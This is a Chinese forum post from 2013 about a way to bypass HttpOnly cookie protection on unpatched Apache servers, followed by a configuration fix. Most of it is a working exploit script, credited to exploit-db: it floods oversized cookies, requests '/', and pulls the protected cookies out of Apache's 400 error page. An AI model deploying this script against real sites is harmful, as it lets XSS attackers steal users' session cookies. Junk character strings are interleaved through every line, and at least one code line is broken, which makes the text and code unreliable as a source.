很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。! Y2 `' n8 T2 I) Y6 v$ f( d
2 o: ~7 C( Z1 y6 c( H4 Z* J用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
" b) y" ]4 m9 x' j
1 `3 ^* q$ g M F! O) C+ L7 |9 P
// http://www.exploit-db.com/exploits/18442// H6 X6 f. d3 a/ [
function setCookies (good) {/ `5 {3 H) v G2 Q K. S
// Construct string for cookie value
6 ~" P, H8 p F+ S* Q' k" nvar str = "";
, a) y$ \6 _) B1 X9 R9 gfor (var i=0; i< 819; i++) {
" Y0 f9 A( {# `str += "x";
5 Q/ I' T$ u; c' @) d0 D7 @}
8 g& h D4 G+ j+ [6 F8 y: a// Set cookies; X7 C8 ~& h T# H
for (i = 0; i < 10; i++) {( {# n; T, [7 z+ c( o- \
// Expire evil cookie3 c2 E+ }3 I$ ^5 x0 \4 y: z a
if (good) { z" A$ W, a& H9 k( [# ^+ Q2 ^ ]
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
+ R0 o/ R0 e2 _5 F}: n: ~8 Y; R2 P
// Set evil cookie
* X; R( h3 Q2 Qelse {4 w5 ^. L7 z$ T
var cookie = "xss"+i+"="+str+";path=/";; {0 X6 L' O' m
}; u* s' b Y S, J
document.cookie = cookie;
. a2 O+ f# k4 `5 L$ f}! `3 m( ^4 Z) f* w+ S. h$ y. ^
}! V& x. f2 y( y
function makeRequest() {
5 |% v9 L( b2 FsetCookies();+ i9 m- T2 w) l
function parseCookies () {8 Y3 K/ t; a: e& c' |2 F
var cookie_dict = {};
. v; C' O$ Z& x// Only react on 400 status1 @( W( Q8 m& P/ q2 p* y3 q- [$ [4 O
if (xhr.readyState === 4 && xhr.status === 400) {& [; ~( Q" \- ^/ ^; o
// Replace newlines and match <pre> content* O9 n- t8 i/ r# E) d
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
8 k: }% k t4 i' o+ xif (content.length) {- A& D3 u5 F) N5 y% C" a. W
// Remove Cookie: prefix! @7 ]& Y3 A1 }
content = content[1].replace("Cookie: ", "");
5 \0 `% I7 \2 `7 svar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);# E, |$ e. M+ Q6 T1 Q# X0 C
// Add cookies to object
" d9 O$ c5 f! b X+ ], H5 jfor (var i=0; i<cookies.length; i++) {! @( U* l5 O3 T" r$ Q. {0 m/ x0 M6 P
var s_c = cookies.split('=',2);, ]$ O) K, u8 C0 p9 f
cookie_dict[s_c[0]] = s_c[1];+ z- s" B. B2 H- p
}& t+ H# }- e, \2 S. Y" ]8 F
}
: h& @5 H# z. |// Unset malicious cookies) M! d0 R- Q/ X0 E* i3 r+ t
setCookies(true);
6 m4 j. d8 b, Talert(JSON.stringify(cookie_dict));7 p& Z- m4 @7 d" e% Y
}
! \7 \0 d/ M% d. }; i6 K- [7 ~9 ^2 N}
8 N$ N; g' S, L3 m3 ]) s7 S% y// Make XHR request
# {$ d; p+ x8 Gvar xhr = new XMLHttpRequest();7 e( W* d, x P7 _* `1 R
xhr.onreadystatechange = parseCookies;" d( R) {( ~( ~+ s3 k
xhr.open("GET", "/", true);
- o: \4 O! ~$ m6 Dxhr.send(null);9 X; g- x8 H' Z) U
}& V3 k6 _) T( B% H% g3 e- Z
makeRequest();: P2 i/ A4 W5 O4 C
# b% l. l/ N9 f* @. c3 o
你就能看见华丽丽的400错误包含着cookie信息。! h% l. N! U @. m6 N
( `$ | I B% I
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
- v R5 p3 N3 o; t3 o- Y# m- C1 L( ^4 L7 |" X- @
修复方案:8 N' u, E. q! { @* T4 Z
4 q3 t* Q: r7 TApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
9 o0 z7 I8 u+ v. J" K' F3 V
?8 S/ ~5 z6 M- u) }; v. }+ F! K {In the event of a problem or error, Apachecan be configured to do one of four things,
K0 X6 S7 v' y* X+ O. o G* b4 d8 f& O# ~+ E
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息# i& E1 K$ g+ g* `
2. output acustomized message输出一段信息
* w& W! A, e2 \3 e: `" f8 F3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 * p; ^( Y* d# ?: V8 `- g
4. redirect to an external URL to handle theproblem/error转向一个外部URL
. Q/ p0 R7 E5 G
/ C8 H, G% z* f# z经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容% S. p7 _' T( `: ^
! {/ k$ |/ M7 r( S! |8 X/ o4 e2 ?
Apache配置:
4 r1 H y; P6 b
2 A0 ]/ o. c- ]& p5 u, SErrorDocument400 " security test"# T q7 i1 H$ `% r* O' T
2 W# `. }* W$ H5 [- A& I当然,升级apache到最新也可:)。
& ~4 h( |9 r8 u+ f" v( V
, S! G) q7 g. l% A参考:http://httpd.apache.org/security/vulnerabilities_22.html
: F( F6 ~3 A% e6 i7 m) `
5 c* J3 m. j6 w |
发表于 2013-4-19 19:15:43
收藏
支持
反对